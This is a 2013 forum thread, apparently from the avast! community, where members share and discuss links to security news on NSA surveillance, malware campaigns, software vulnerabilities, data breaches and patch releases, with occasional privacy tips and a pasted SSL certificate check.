We as mere users should always have at the back of our heads that all we do on the Internet is actually done in public, same as we would stand on a soapbox in HydePark (only this time on a global scale).
86 Civil Liberties Groups and Internet Companies Demand an End to NSA Spying
https://www.eff.org/deeplinks/2013/06/86-civil-liberties-groups-and-internet-companies-demand-end-nsa-spying
https://blog.mozilla.org/blog/2013/06/11/stopwatching-us-mozilla-launches-massive-campaign-on-digital-surveillance/
https://optin.stopwatching.us/
-
Zeus now spreads as worm: http://blog.trendmicro.com/trendlabs-security-intelligence/going-solo-self-propagating-zbot-malware-spotted/
link article author = TrendLabs' Abigail Pichel (Technical Communications)
polonus
-
Hi Asyn,
More invisibilty to PRISM outside USA. Use an ISP without servers in the USA. Use I2P overlay network or tor and an open source browser (non-american builds like Google Chrome), use your provider web-mail, use YaCy for searching. Use ICQ chat which is now Russian owned and VOIPBuster, use a different mail account for mobile services are a few of the steps you could take, (tips were taken from link article author Kristian van Tuil, see: http://computerworld.nl/beveiliging/78073-in-6-stappen-buiten-bereik-van-prism
Personally I do not feel the need for all this, but for those that feel some urge to do so....
For instance loads of tor nodes are owned by amazon, so open to PRISM: http://torstatus.blutmagie.de/ 27 seen with .compute dot amazonaws dot com
I think there really is no escape from this giga data snooping
polonus
-
There may not be any escape Damien but that doesn't mean we should take this laying down.
http://bob3160.blogspot.com/2013/06/personal-information-privacy-and.html (http://bob3160.blogspot.com/2013/06/personal-information-privacy-and.html)
-
polonus and You think the Russia, Chine and other big gov don't have own version of PRISM already ? :) so suggesting Russian owned ICQ is quite weird ...
-
polonus and You think the Russia, Chine and other big gov don't have own version of PRISM already ? :) so suggesting Russian owned ICQ is quite weird ...
What are you talking about ??? Who is suggesting what ???
-
Google surveillance far surpasses the NSA, author says
By Wyatt Andrews
June 11, 2013 7:19 PM
Cut!
"For years, Google's computers have scanned the content of millions of Gmails -- Google's popular email service -- in order to figure out what ads the users might respond to. Many users don't realize they've given Google permission to eavesdrop in the agreement that opens their account."
http://www.cbsnews.com/8301-18563_162-57588833/google-surveillance-far-surpasses-the-nsa-author-says/
-
Microsoft Security Bulletin Advance Notification for June 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jun
Microsoft doesn't close all holes on June patch day
http://www.h-online.com/security/news/item/Microsoft-doesn-t-close-all-holes-on-June-patch-day-1887051.html
-
Google surveillance far surpasses the NSA, author says
By Wyatt Andrews
June 11, 2013 7:19 PM
Cut!
"For years, Google's computers have scanned the content of millions of Gmails -- Google's popular email service -- in order to figure out what ads the users might respond to. Many users don't realize they've given Google permission to eavesdrop in the agreement that opens their account."
http://www.cbsnews.com/8301-18563_162-57588833/google-surveillance-far-surpasses-the-nsa-author-says/ (http://www.cbsnews.com/8301-18563_162-57588833/google-surveillance-far-surpasses-the-nsa-author-says/)
And you actually believe this garbage ???
-
Hi bob3160,
If that would not be so there would not be an open internet ;)
Is Johnny 4745 afraid someone has listened in on his pillow talk? ;D
Damian
-
Users warned to remove Debian Multimedia repository
http://www.h-online.com/security/news/item/Users-warned-to-remove-Debian-Multimedia-repository-1888493.html
http://bits.debian.org/2013/06/remove-debian-multimedia.html
-
Big Brother may not be listening, but he's watching: Why metadata snooping is legal
By Bob Sullivan, Columnist, NBC News
Cut!
Wiretaps and warrants
The Fourth Amendment stems from a simple idea: Law enforcement officials can observe your home from the street, but in most cases they can't barge in unless they prove to a judge they need to. In the digital world, the line between knocking on your door and barging in is much more complicated. And as the analogy breaks down, so too it seems has Fourth Amendment protection.
The Whole Article:
http://redtape.nbcnews.com/_news/2013/06/15/18938604-big-brother-may-not-be-listening-but-hes-watching-why-metadata-snooping-is-legal?lite
-
You are still quoting posts from tainted and partial sources.... IMHO :)
-
Yahoo, Bing Found Directing to Bitcoin Phishing Site (http://threatpost.com/yahoo-bing-found-directing-to-bitcoin-phishing-site/)
(http://trtpost.wpengine.netdna-cdn.com/files/2013/06/gox-680x400.jpg)
-
Oracle Java SE Critical Patch Update Pre-Release Announcement - June 2013
http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html
-
See: http://threattrack.tumblr.com/post/52635380368/wells-fargo-important-document-attachment-spam
domain found here, daily updates: http://malwareurls.joxeankoret.com/normal.txt
polonus
-
Spycam vulnerability reappears in Google Chrome's Flash
http://www.h-online.com/security/news/item/Spycam-vulnerability-reappears-in-Google-Chrome-s-Flash-1892051.html
-
Google Docs - Viewer: https://docs.google.com/viewer actively being abused bt seinup malware: http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html link article author = Chong Rong Hwa
polonus
-
Google Docs - Viewer: https://docs.google.com/viewer (https://docs.google.com/viewer) actively being abused bt seinup malware: http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html (http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html) link article author = Chong Rong Hwa
polonus
Why do you need the Google Docs Viewer ??? The viewing ability is built directly into Chrome ???
-
Google Docs - Viewer: https://docs.google.com/viewer (https://docs.google.com/viewer) actively being abused bt seinup malware: http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html (http://www.fireeye.com/blog/technical/malware-research/2013/06/trojan-apt-seinup-hitting-asean.html) link article author = Chong Rong Hwa
polonus
Why do you need the Google Docs Viewer ??? The viewing ability is built directly into Chrome ???
it is really user choice. some of us choose not to use chrome, so pol's notice is pertinent to those who don't.
-
@mchain & @bob3160
I posted this because that viewer is being abused by malcreants, that is the news here, not why we need that viewer or not,
malcreants use something good and trusted for evil purposes, e.g. to communicate with their malbots!
Another threat a lot of the most popular Wordpress-plug-ins maybe insecure (20% are holed) and will lead to plenty of hacked websites, read this report:
http://www.checkmarx.com/wp-content/uploads/2013/06/The-Security-State-of-WordPress-Top-50-Plugins.pdf (source: checkmarx source code analysis)
polonus
-
openxadvertising.com Mass Malvertising Campaign
http://research.zscaler.com/2013/06/openxadvertisingcom-mass-malvertising.html
-
openxadvertising.com Mass Malvertising Campaign
http://research.zscaler.com/2013/06/openxadvertisingcom-mass-malvertising.html (http://research.zscaler.com/2013/06/openxadvertisingcom-mass-malvertising.html)
The malicious advertisements were delivered from openxadvertising.com, which is currently blocked (http://google.com/safebrowsing/diagnostic?site=openxadvertising.com) by Google SafeBrowsing.
-
Ad injection onto your computer: http://blogs.technet.com/b/mmpc/archive/2013/06/20/ad-injection-and-you-how-adware-gets-on-your-computer.aspx
link article author = Chris Stubbs
polonus
-
MS has released a fixit to block all java in IE
Java is a unique form of extensibility because it can be invoked in the following two ways: •By using an applet
element
•By using an object
element that has a CLSID of a Java virtual machine (JVM)
These two invocation methods are subject to different security controls. This Knowledge Base Article contains a Fix it solution to disable the Java web plug-in from being loaded through these controls. The Fix it solution will also disable the Java Network Launching Protocol (JNLP) handler.
http://support.microsoft.com/kb/2751647
-
Malcreants use instruction trick to circumvent av detection vua undocumented FPU instructions, read: http://blogs.technet.com/b/mmpc/archive/2013/06/24/investigation-of-a-new-undocumented-instruction-trick.aspx
link article author: Daniel Radu MMPC Munich
How are the authors, if they're different people, sharing information? asks the author of the article.
I have recently seen that info on attack code is being shared via hidden urls injected to innocent websites,
if you don't stumble onto the links by accident via an search engine indexer and searching for the topic you won't find these links...
See: http://lists.nongnu.org/archive/html/qemu-devel/2013-05/msg03684.html for patches on the glitch...
polonus
-
"You can run, but you can't hide" (http://www.zdnet.com/firm-facebooks-shadow-profiles-are-frightening-dossiers-on-everyone-7000017199/)
"Right now commenters across the Internet will be saying, Don't join Facebook or Delete your account.
But it appears that we're subject to Facebook's shadow profiles whether or not we choose to participate."
All of this is the result of Facebook's Shadow Profiling......
-
Google finds up 10.000 new malicious sites a day: https://www.google.com/transparencyreport/safebrowsing/
polonus
-
Backup program allows root access to LG smartphones
http://www.h-online.com/security/news/item/Backup-program-allows-root-access-to-LG-smartphones-1896506.html
-
Vast majority of malware attacks spawned from legit sites (http://arstechnica.com/security/2013/06/vast-majority-of-malware-attacks-spawned-from-legit-sites/)
(http://cdn.arstechnica.net/wp-content/uploads/2013/06/google-malicious-website-data-640x345.jpg)
-
Mobile malware grows by 614 percent in last year (http://news.cnet.com/8301-1009_3-57591042-83/mobile-malware-grows-by-614-percent-in-last-year/)
(http://asset3.cbsistatic.com/cnwk.1d/i/tim2/2013/06/25/Screen_Shot_2013-06-25_at_6.33.02_PM_610x395.png)
-
Security breach stopped [Opera]
http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack
-
Meet PRISM’s little brother: Socmint (http://arstechnica.com/tech-policy/2013/06/meet-prisms-little-brother-socmint/)
(http://cdn.arstechnica.net/wp-content/uploads/2013/06/cameras-640x428.jpg)
When will "Big Brother" realize that he is infringing on our right to privacy ?
Is all of this really keeping us safe ???
-
Perfect Forward Secrecy can block the NSA from secure web pages, but no one uses it! (http://blogs.computerworld.com/encryption/22366/can-nsa-see-through-encrypted-web-pages-maybe-so)
(Michael Horowitz does a masterful job of breaking down a complex issue into it’s components.
If security is your thing – this is a must read.)
(http://blogs.computerworld.com/sites/computerworld.com/files/u147/nsa.website.headline.jpg)
-
Heads-up on this warning coming from Lab65's Ahmad Azziz: http://blog.lab69.com/2013/01/404-and-youve-been-exploited.html
Be aware of a trick where browser display an error page (php mysql error, cpanel error, or page not found) with HTTP response 200, but instead, it contains malicious JavaScript code on the backend to exploit users when the page is loaded.
polonus
-
Hard drive-wiping malware part of new wave of threats targeting South Korea
http://arstechnica.com/security/2013/06/hard-drive-wiping-malware-part-of-new-wave-of-threats-targeting-south-korea/
-
Heads-up on this warning coming from Lab65's Ahmad Azziz: http://blog.lab69.com/2013/01/404-and-youve-been-exploited.html
Be aware of a trick where browser display an error page (php mysql error, cpanel error, or page not found) with HTTP response 200, but instead, it contains malicious JavaScript code on the backend to exploit users when the page is loaded.
polonus
This is what showed up when I clicked on your link.
-
not strange, since lab69 is a blog for malware analysis.... lots of strange stuff posted there. ;)
-
Heads-up on this warning coming from Lab65's Ahmad Azziz: http://blog.lab69.com/2013/01/404-and-youve-been-exploited.html
Be aware of a trick where browser display an error page (php mysql error, cpanel error, or page not found) with HTTP response 200, but instead, it contains malicious JavaScript code on the backend to exploit users when the page is loaded.
polonus
This is what showed up when I clicked on your link.
-Midnight the website is clean it just FP by BitDefender https://www.virustotal.com/en/url/1f4576a80272b522dfc66c4d9be47403ba0f799a16cf444a7d077d8b74d4c722/analysis/1372588878/
-
Android Hack-Tool Steals PC Info
http://www.f-secure.com/weblog/archives/00002573.html
-
A devious combo to avoid.....
Two malware programs help each other to beat antivirus detection:
http://www.itworld.com/security/363322/two-malware-programs-help-each-other-stay-computers
polonus
-
Top5 Fake Security Scanners: http://blog.webroot.com/2013/06/27/top-5-fake-security-rogues-of-2013/
link article author = tylermoffitt
polonus
-
Attackers gain access to Ubisoft customer data
http://www.h-online.com/security/news/item/Attackers-gain-access-to-Ubisoft-customer-data-1910357.html
http://blog.ubi.com/security-update-for-all-ubisoft-account-holders/
-
Majority of windows computers infested through java: https://www.csis.dk/en/csis/news/3981/ link article author = Peter Kruse
84.3 % of all virus infections can be traced back to the drive-by attacks from malicious or compromised websites
polonus
-
Microsoft Security Bulletin Advance Notification for July 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jul
-
Wasn't sure where to post this.
http://miami.cbslocal.com/2013/07/07/growing-problem-of-tech-support-scams/
-
Exploit for Android signing hole published
http://www.h-online.com/security/news/item/Exploit-for-Android-signing-hole-published-1914228.html
-
New backdoor in HP server products
http://www.h-online.com/security/news/item/New-backdoor-in-HP-server-products-1916506.html
-
Telstra storing data on behalf of US government
http://www.theage.com.au/it-pro/security-it/telstra-storing-data-on-behalf-of-us-government-20130712-hv0w4.html
-
Microsoft gave NSA's PRISM access to Skype, Outlook.com and SkyDrive
http://www.h-online.com/security/news/item/Microsoft-gave-NSA-s-PRISM-access-to-Skype-Outlook-com-and-SkyDrive-1916730.html
http://www.guardian.co.uk/world/2013/jul/11/microsoft-nsa-collaboration-user-data
-
FBI-themed ransomware now affecting OS X users (http://www.slashgear.com/fbi-themed-ransomware-now-affecting-os-x-users-15290470/)
(http://cdn.slashgear.com/wp-content/uploads/2013/07/ransomware1-580x394.png)
-
Critical vulnerabilities in numerous ASUS routers
http://www.h-online.com/security/news/item/Critical-vulnerabilities-in-numerous-ASUS-routers-1918469.html
-
10 year old API vulnerability, issue 69, troubles java 7: http://archives.neohapsis.com/archives/fulldisclosure/2013-07/0172.html
article author Adam Gowdiak
If you can do without java uninstall it,
polonus
PS Let us make it a two-in-one java alert: http://www.securityweek.com/multiple-java-instances-keep-enterprise-systems-vulnerable-attack-report
link source Security Week's Fahmida Y. Rashid
-
it would be really nice if Oracle joined the MS security initiative ...
since Adobe and some others joined it, it really helped to decrease the amount of critical vulnerabilities ...
anyway the whole Java 7 story is real tragedy (i can understand Java 6 was old code and under massive amount of attacks)
thanks a lot for posting this ;( the details about go totally around the Java sandbox is nasty
-
Chinese Hackers discovered second Android master key vulnerability
http://thehackernews.com/2013/07/chinese-hackers-discovered-second.html
-
Windows Media Player 12 Plugin: Arbitrary File Read Vulnerability
http://www.rawsec.net/wmp-vulnerability.html
-
Ubuntu Forums got hacked
http://ubuntuforums.org/announce.html
-
Hi forum friends,
During my automated security scannings
I have found that an enormous amount of websites
are still vulnerable to configuration insecurities.
These insecurities are grossly underestimated
by webmasters and sloppy IT staff alike,
opening up a goldmine of unintended information for malicious attackers.
At least security through obscurity should be a priority.
Important insecurities found:
1. excessive headers
(info can be used to pinpoint security flaws to attackers).
2. clickjacking (X-frame option header not returned),
malcontent can be embedded in a frame.
ASP netsites can be scanned here at: https://asafaweb.com/Scan?Url=
Other sites can be scanned at: safersite.de
polonus
-
Urausy Lockscreen: Your computer will remain locked for 3 days, 11 hours and 20 minutes! (https://blog.avast.com/2013/07/24/urausy-lockscreen-your-computer-will-remain-locked-for-3-days-11-hours-and-20-minutes/)
(https://blog.avast.com/wp-content/uploads/2013/07/00-urausy_mainlogo.png)
The good thing for us is that it's detected by avast!. :)
-
Who do you trust ???
Virus total scan results:
https://www.virustotal.com/en/file/7d01bd6c9fef5b1cdddee4de1d5a03edce07c2b706fc566753949992775fcf67/analysis/1372871468/ (https://www.virustotal.com/en/file/7d01bd6c9fef5b1cdddee4de1d5a03edce07c2b706fc566753949992775fcf67/analysis/1372871468/)
or avast!:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1374664221488-2273.png)
Link received from a "friend" first analyzed and reported clean.
Thanks avast! for always having my back!
-
Use different passwords for different sites.
Hello,
You are receiving this message because you have an account registered with this address on ubuntuforums.org.
The Ubuntu forums software was compromised by an external attacker. As a result, the attacker has gained access to read your username, email address and an encrypted copy of your password from the forum database.
If you have used this password and email address to authenticate at any other website, you are urged to reset the password on those accounts immediately as the attacker may be able to use the compromised personal information to access these other accounts. It is important to have a distinct password for different accounts.
The ubuntuforums.org website is currently offline and we are working to restore this service. Please take the time to change your ubuntuforums.org account password when service is restored.
We apologize for any inconvenience to the Ubuntu community, thank you for your understanding.
The Canonical Sysadmins.
-
Multisystem Trojan Janicab attacks Windows and MacOSX via scripts
Analysis Report in the Avast Blog:http://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/
There are also many JS: Detections added with Database version 130724-0
http://www.avast.com/de-de/virus-update-history
-
Orbit Downloader versions causing massive SYN flooding
http://seclists.org/bugtraq/2013/Jul/155
-
Watch for malicious links! https://www.facebook.com/photo.php?fbid=10151592091117426&set=a.449448457425.237286.38282497425&type=1&relevant_count=1 (https://www.facebook.com/photo.php?fbid=10151592091117426&set=a.449448457425.237286.38282497425&type=1&relevant_count=1)
Not sure it this goes here: http://www.tomsguide.com/us/free-antivirus-best-popular-most-effective-review,review-1788-2.html (http://www.tomsguide.com/us/free-antivirus-best-popular-most-effective-review,review-1788-2.html) (For users that think avast! will protect against anything, even from themselves).
One item left out: Use of a torrent program: Use of such is not a problem as the program itself may be clean, but connections to unknown computers and unknown status of such is.
-
Malwarebytes Adopts Aggressive PUP Policy
http://blog.malwarebytes.org/news/2013/07/malwarebytes-adopts-aggressive-pup-policy/
-
Digital Carjackers Show Off New Attacks
http://www.youtube.com/watch?v=oqe6S6m73Zw&feature=youtu.be
I hope that this does not happen to me sometime........
-
Ubuntu Forums got hacked
http://ubuntuforums.org/announce.html
Ubuntu Forums are back up and a post mortem
http://blog.canonical.com/2013/07/30/ubuntu-forums-are-back-up-and-a-post-mortem/
-
Satis automatic toilets vulnerable to hacker attacks, Trustwave warns
http://www.news.com.au/technology/biztech/satis-automatic-toilets-vulnerable-to-hacker-attacks-trustwave-warns/story-fn5lic6c-1226691757637
-
Satis automatic toilets vulnerable to hacker attacks, Trustwave warns
http://www.news.com.au/technology/biztech/satis-automatic-toilets-vulnerable-to-hacker-attacks-trustwave-warns/story-fn5lic6c-1226691757637
I wouldn't regard that as something worthy of a security warning notice, it could be rather embarrassing though if your on the toilet and some kid with to much time on his hands wants to start playing around with your toilet while you are on it ;D
-
More than that Craig I've seen kids in the men's room playing games while sitting on the toilet and it was loud, and sometimes I yelled out to them and say hurry up and finished you're toilet job ;D ;D
Edit: Kids can do strange things to their iphone if you know what I mean without their parents knowing and I have to goes some place else while they enjoining to them self's, and I don't bloody want to know about it ;D ;D
-
Google Chrome security flaw offers unrestricted password access
http://www.theguardian.com/technology/2013/aug/07/google-chrome-password-security-flaw
one reason why i never store passwords in browser....
-
Google Chrome security flaw offers unrestricted password access
http://www.theguardian.com/technology/2013/aug/07/google-chrome-password-security-flaw
one reason why i never store passwords in browser....
Not a bug, Google designed it that way. Why they did that, I do not know.
-
Zeus P2P Protocol is Transitioning to a New Port Range
Info through the Polish Computer Emergency Response Team (CERT)
https://blog.damballa.com/archives/2084
polonus
-
Thieves Reaching for Linux—”Hand of Thief” Trojan Targets Linux #INTH3WILD
https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/
-
Microsoft Security Bulletin Advance Notification for August 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-aug
-
Adobe Reader XI (11.0.03) Remote Code Execution Exploit
http://www.youtube.com/watch?v=0xSw0S8PvP8&feature=youtu.be
-
Popular download management program has hidden DDoS component (http://www.pcworld.com/article/2047240/popular-download-management-program-has-hidden-ddos-component-researchers-say.html)
If you have to use a download manager, choose it carefully.
-
Fake Malwarebytes Scammer Surveys Victims (http://blog.malwarebytes.org/news/2013/08/fake-malwarebytes-scammer-surveys-victims/)
-
Justice Department slip names Google in data demands case. (http://news.cnet.com/8301-1023_3-57600140-93/justice-department-slip-names-google-in-data-demands-case/)
Google is one of the few companies thought to have contested such requests.
-
Cybercriminals target Android platforms.
http://www.av-comparatives.org/wp-content/uploads/2013/08/apkstores_investigation_2013.pdf
Not a good idea to use a 3rd party app store.
-
Virus targets the social network in new fraud twist
http://www.reuters.com/article/2013/08/16/us-instagram-cyberfraud-idUSBRE97F0XD20130816
-
Linux HID security flaws
http://www.openwall.com/lists/oss-security/2013/08/28/13
-
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5
if you run recent vB forums , rush and fix
-
Java Code Signing Failures
http://www.duckware.com/tech/javacodesigningfailure.html
-
Pre-cooked weaknesses in encryption security: http://www.theguardian.com/world/2013/sep/05/nsa-gchq-encryption-codes-security
polonus
-
Microsoft Security Bulletin Advance Notification for September 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-sep
-
New Ransomware Crypto Lock is encrypting all files on your Harddrive
http://blog.emsisoft.com/
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2
-
New Ransomware Crypto Lock is encrypting all files on your Harddrive
http://blog.emsisoft.com/ (http://blog.emsisoft.com/)
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2 (http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2)
Using WinPatrol will also alert you if any attempt is made to change the registry RE: auto run Key.
-
New Ransomware Crypto Lock is encrypting all files on your Harddrive
http://blog.emsisoft.com/ (http://blog.emsisoft.com/)
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2 (http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AWin32%2FCrilock.A&ThreatID=-2147284168#tab=2)
Using WinPatrol will also alert you if any attempt is made to change the registry RE: auto run Key.
TR/Crilock.B is Detected by Avast: https://www.virustotal.com/en/file/d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9/analysis/
-
Thanks for that info. ;)
-
Vulnerability in Internet Explorer could allow remote code execution
https://support.microsoft.com/kb/2887505 (https://support.microsoft.com/kb/2887505)
-
Vulnerability in Internet Explorer could allow remote code execution
https://support.microsoft.com/kb/2887505 (https://support.microsoft.com/kb/2887505)
Additional information here: http://nakedsecurity.sophos.com/2013/09/18/internet-explorer-zero-day-exploit-prompts-microsoft-to-publish-emergency-fix-it/ (http://nakedsecurity.sophos.com/2013/09/18/internet-explorer-zero-day-exploit-prompts-microsoft-to-publish-emergency-fix-it/) Note: No fix-it solution available for IE 64-bit iterations yet. Digital signature for fix-it 51001 32-bit released September 16, 2013.
-
Malwarebytes Database optimization today 9/17/2013
http://forums.malwarebytes.org/index.php?showtopic=133418
-
Malwarebytes Database optimization today 9/17/2013
http://forums.malwarebytes.org/index.php?showtopic=133418
Thanks for the head up Pondus ;)
-
Thanks from me too, Pondus. Since I've got the free version and just do an on-demand scan once a week, I only update shortly before scanning. I'd noticed in the past that the download size would sometimes drop sharply (typically by about a meg) from one week to the next, but never really wondered why.
-
iOS 7 security flaws uncovered as new iPhones released
http://www.theage.com.au/digital-life/mobiles/ios-7-security-flaws-uncovered-as-new-iphones-released-20130920-2u3ed.html
-
iOS 7 Bug Lets Anyone Bypass iPhone's Lockscreen To Hijack Photos, Email, Or Twitter
http://www.forbes.com/sites/andygreenberg/2013/09/19/ios-7-bug-lets-anyone-bypass-iphones-lockscreen-to-hijack-photos-email-or-twitter/
-
Update on IE use-after-free vulnerability
Tech blog Microsoft Security Response Center announces new Fix-it and out-of-band release Windows Update patch for all versions of IE: http://blogs.technet.com/b/msrc/archive/2012/09/19/internet-explorer-fix-it-available-now-security-update-scheduled-for-friday.aspx (http://blogs.technet.com/b/msrc/archive/2012/09/19/internet-explorer-fix-it-available-now-security-update-scheduled-for-friday.aspx)
-
Threat Level Yellow: Protection recommendations regarding Internet Explorer exploits in the wild
https://isc.sans.edu/forums/diary/Threat+Level+Yellow+Protection+recommendations+regarding+Internet+Explorer+exploits+in+the+wild/16634
http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx
-
Threat Level Yellow: Protection recommendations regarding Internet Explorer exploits in the wild
https://isc.sans.edu/forums/diary/Threat+Level+Yellow+Protection+recommendations+regarding+Internet+Explorer+exploits+in+the+wild/16634
http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx
Simple remedy is to use a different browser till the fix is available.
-
More information about IE, all versions, exploits, attacks:
http://www.pcadvisor.co.uk/news/security/3470426/internet-explorer-zero-day-attackers-linked-to-bit9-hackers/ (http://www.pcadvisor.co.uk/news/security/3470426/internet-explorer-zero-day-attackers-linked-to-bit9-hackers/)
Some published reports state that this attack team uses a weaponized version and so far has been used to attack only enterprise/commercial users using IE 8 and IE 9.
-
Data Broker Giants Hacked by ID Theft Service
http://krebsonsecurity.com/2013/09/data-broker-giants-hacked-by-id-theft-service/
-
Starting next year: https://cabforum.org/pipermail/public/2013-September/002233.html
Google Weaker SSL-Certificate alerts
This also seen to these developments: http://www.theguardian.com/world/2013/sep/05/nsa-gchq-encryption-codes-security
Also Bruce Schneier warned about these issues leaving everyone less secure.
In the meantime I check with Calomel SSL Validation in firefox: https://addons.mozilla.org/En-us/firefox/addon/calomel-ssl-validation/
polonus
-
So Google is going to implement their own certificate verification system like in Firefox. ;)
-
Hi Steven Winderlich,
Seems so,
Well I like a check like this example from DigiCert® SSL Installation Diagnostics Tool:
DNS resolves 'www.security.nl' to 213.156.0.246
HTTP Server Header: Apache
SSL certificate
Common Name = www.security.nl
Subject Alternative Names = www.security.nl
Issuer = Thawte DV SSL CA
Or Why no padlock?
Domain Name: www.security.nl
URL Tested: https://www.security.nl
Number of items downloaded on page: 24
Valid Certificate found.
Certificate valid through: Dec 13 23:59:59 2013 GMT
Certificate Issuer: Thawte, Inc.
All 24 items called securely!
Serial Number = 67ED771B1120A17564A4685737F1D84A
SHA1 Thumbprint = 3C6925620CBFBE09098886F4306F32DE0A363E29
Key Length = 2048 bit
Signature algorithm = SHA1 + RSA (good)
Secure Renegotiation: Supported
SSL ciphers supported by the server
TLS_RSA_WITH_RC4_128_MD5
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_256_CBC_SHA256
TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
TLS_RSA_WITH_SEED_CBC_SHA
TLS_DHE_RSA_WITH_SEED_CBC_SHA
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
This certificate does not use a vulnerable Debian key (this is good)
SSL Certificate expiration
The certificate expires December 13, 2013 (78 days from today)
Certificate Name matches www.security.nl
Subject www.security.nl
Valid from 13/Dec/2012 to 13/Dec/2013
Issuer Thawte DV SSL CA
Subject Thawte DV SSL CA
Valid from 18/Feb/2010 to 17/Feb/2020
Issuer thawte Primary Root CA
Subject thawte Primary Root CA
Valid from 17/Nov/2006 to 30/Dec/2020
Issuer Thawte Premium Server CA
SSL Certificate is correctly installed
or this examplke from Why No Padlock?
Domain Name: www.security.nl
URL Tested: https://www.security.nl
Number of items downloaded on page: 24
Valid Certificate found.
Certificate valid through: Dec 13 23:59:59 2013 GMT
Certificate Issuer: Thawte, Inc.
All 24 items called securely!
polonus
-
Duh, iOS 7 Does Not Make Your iPhone, iPad Waterproof ;D
http://www.pcmag.com/article2/0,2817,2424780,00.asp
http://news.sky.com/story/1145439/waterproof-iphone-advert-owners-fooled
-
Unpatched IE-hole abused in cyber-espionage: http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/hand-me-downs-exploit-and-infrastructure-reuse-among-apt-campaigns.html link article authors Ned Moran and Nart Villeneuve
A MS-Fix-it is available, but no patch has been issues yet,
pol
-
Illegal Access to Adobe Source Code
http://blogs.adobe.com/asset/2013/10/illegal-access-to-adobe-source-code.html
-
Hi Asyn,
And this as a reaction on this data breach: http://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
What gonna be the implications?
polonus
-
What gonna be the implications?
Well, we'll see over the next few days/weeks...
As you understand German: http://www.heise.de/security/meldung/Einbruch-bei-Adobe-Millionen-Kundendaten-sowie-Sourcecode-von-ColdFusion-und-Acrobat-geklaut-1972175.html
-
Microsoft Security Bulletin Advance Notification for October 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-oct
-
Hi Asyn,
Thanks for that article link.
Others here could google translate that articlke txt into UK English or American English.
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Users should also explicitly allow the use of these readers in the browser
as is the rule with a lot of browsers now.
They should rfeally pre-scan document links or re-check these particular software executables and update uri's for malcode.
Through these latest hacks Adobe has manoevered itself into the ranks of Java and likewise security-problematic codes.
polonus
-
Hi Asyn,
Thanks for that article link.
Others here could google translate that articlke txt into UK English or American English.
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Users should also explicitly allow the use of these readers in the browser
as is the rule with a lot of browsers now.
They should rfeally pre-scan document links or re-check these particular software executables and update uri's for malcode.
Through these latest hacks Adobe has manoevered itself into the ranks of Java and likewise security-problematic codes.
polonus
If you're using Chrome, it already handles that function. :)
-
Hi bob3160,
Writing this in Google Chrome actually, thanks for the reassurance. Good Google Chrome was an early starter with Google Safebrowsing and the plug-in security.
polonus
-
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Unrelated to this issue, I do exactly that for a long time. (My personal suggestion is the free PDF-XChange Viewer.)
-
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Unrelated to this issue, I do exactly that for a long time. (My personal suggestion is the free PDF-XChange Viewer.)
I have long given up adobe reader, bloated, vulnerable a target for exploit.
I too have been using PDF-XChange Viewer for some time now (a year or more) I gave up on fox-it reader, became too much hassle and it tried to install other stuff.
-
